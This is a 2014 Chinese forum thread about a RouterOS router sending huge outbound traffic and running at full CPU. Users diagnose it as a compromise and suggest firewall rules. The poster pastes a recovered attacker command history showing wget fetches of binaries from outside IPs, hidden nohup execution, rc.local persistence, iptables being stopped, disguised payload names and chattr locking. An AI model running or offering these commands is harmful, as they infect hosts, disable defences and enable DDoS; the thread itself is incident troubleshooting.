qile 发表于 2014-5-29 00:30:09

ros默认路由流量流量异常,外网攻击速度1500m多,谁能有这么大流量

本帖最后由 qile 于 2014-5-29 00:31 编辑

如题,最近ros的cpu使用率 100%默认路由pppoe-out1有时候tx流量是1500m 谁有这么大流量攻击
其他没发现异常

是什么造成这个原因,难道内网有回流?
pppoe-out1 禁用后,马上 pppoe-out2流量上去了,也禁用后pppoe-out3的tx流量就上去了
pppoe-out1 拨号后,流量有转到pppoe-out1上了


9939781 发表于 2014-5-29 00:46:05

tx是发送流量,也就是你在攻击别人。torch里应该可以看到你攻击的ip

qile 发表于 2014-5-29 00:58:15

确实存在在大流量的访问外网ip,但是内外没有找到发送的ip地址
甚至没有发现内网流量超过5m的ip地址

yunwa0429 发表于 2014-5-29 01:27:20

你计费是RM?

qile 发表于 2014-5-29 01:29:31

yunwa0429 发表于 2014-5-29 01:27
你计费是RM?

是的,计费是rm 和ros集成在一起的?有问题?

xuxi3201 发表于 2014-5-29 07:26:41

ppoe3是 980M   

ether6是97M。

511789068 发表于 2014-5-29 08:59:14

给外网来个限速

actcs 发表于 2014-5-29 12:40:15

torch找找,不排除你服务器有问题

sealin 发表于 2014-5-29 17:54:34

在fir fil里做源地址检验
估计是伪造源地址的攻击

phenlit 发表于 2014-5-29 19:55:33

本帖最后由 phenlit 于 2014-5-29 19:58 编辑

从图中看到,pppoe-out3应该接到ether6上面。out3外发近985M,网卡97M,网卡6是100M的。ROS往外发数据被堵住了,而进入ROS流量淌不足10M,可以看出是你ROS自发数据包形成的。这个时候你应该检查你的ROS!

phenlit 发表于 2014-5-29 20:07:02

至于禁用out1、out2、out3一条线路,接着下一条会跟着送这么大流量,是因为这条流量只往默认路由上跑。这个时候用堵是不能解决问题的,你的CPU都跑到100%了,必须流量源来自哪里!堵的办法很简单,在ip-firewall-filter表output中需要用到的如tcp8291、udp53做accept,再加一条把output所有drop就行!

qile 发表于 2014-5-29 20:43:53

多谢楼上的解答
肯定是被黑了
决定使用其他版本的去,里面有5月25日下载的文件 拷到本机,win8 系统自带杀毒软件报毒

uname -a
chmod 0777 txma ./txma
/dev/null 2>&1 &
nohup ./txma> /dev/null 2>&1 &
ls
wget http://222.186.15.241:777/2003
chmod 0775 2003
nohup ./2003 > /dev/null 2>&1 &
ifconfig
netstat -antp
netstat -antp
kill -9 8873
chmod 0755 /root/linyx
nohup /root/linyx > /dev/null 2>&1 &
chmod 0755 /root/linix
nohup /root/linix > /dev/null 2>&1 &
echo "cd/root/">>/etc/rc.local
echo "./fallen&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 0755 /root/linyx
nohup /root/linyx > /dev/null 2>&1 &
chmod 0755 /root/linix
nohup /root/linix > /dev/null 2>&1 &
ethtool eth0
echo "cd/root/">>/etc/rc.local
echo "./linyx&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 0755 /root/.bash_histor
nohup /root/.bash_histor > /dev/null 2>&1 &
chmod 0755 /root/.bash_histor
nohup /root/.bash_histor > /dev/null 2>&1 &
ps -ef
kill -9 14550
kill -9 16751
kill -9 16805
14542   10 May24 ?      00:00:19 /root/linix
kill -9 14542
9753   10 May23 ?      00:05:45 /root/linix
kill -9 9753
ps -ef
kill -9 9748
uname -a
wget http://222.186.24.138:8080/yxhl
chmod 0777 yxhl ./yxhl
/dev/null 2>&1 &
nohup ./yxhl> /dev/null 2>&1 &
ps -ef
pwd
ls
wget http://222.186.40.215:888/kaige
chmod 0755 /root/kaige
nohup /root/kaige > /dev/null 2>&1 &
uname -a
chattr +i kaige
echo "cd/root/">>/etc/rc.local
echo "./kaige&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 0755 /root/.gtk-bookmark
nohup /root/.gtk-bookmark > /dev/null 2>&1 &
ethtool eth0
echo "cd/root/">>/etc/rc.local
echo "./.bash_histor&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
只有为神马产生如此大的流量,我也不懂 没时间研究,晚上换了盘,希望没什么问题啦!

yunwa0429 发表于 2014-5-30 01:34:47

应该RM被黑了,和我的情况一样

qile 发表于 2014-5-30 16:34:50

楼上的 你怎么处理的 端口2222密码是默认的吗?

crack_ros 发表于 2014-6-1 23:04:40

你的内网有人搞鬼或者有网卡坏了

你的PPPOE策略没做限速的?
页: [1] 2
查看完整版本: ros默认路由流量流量异常,外网攻击速度1500m多,谁能有这么大流量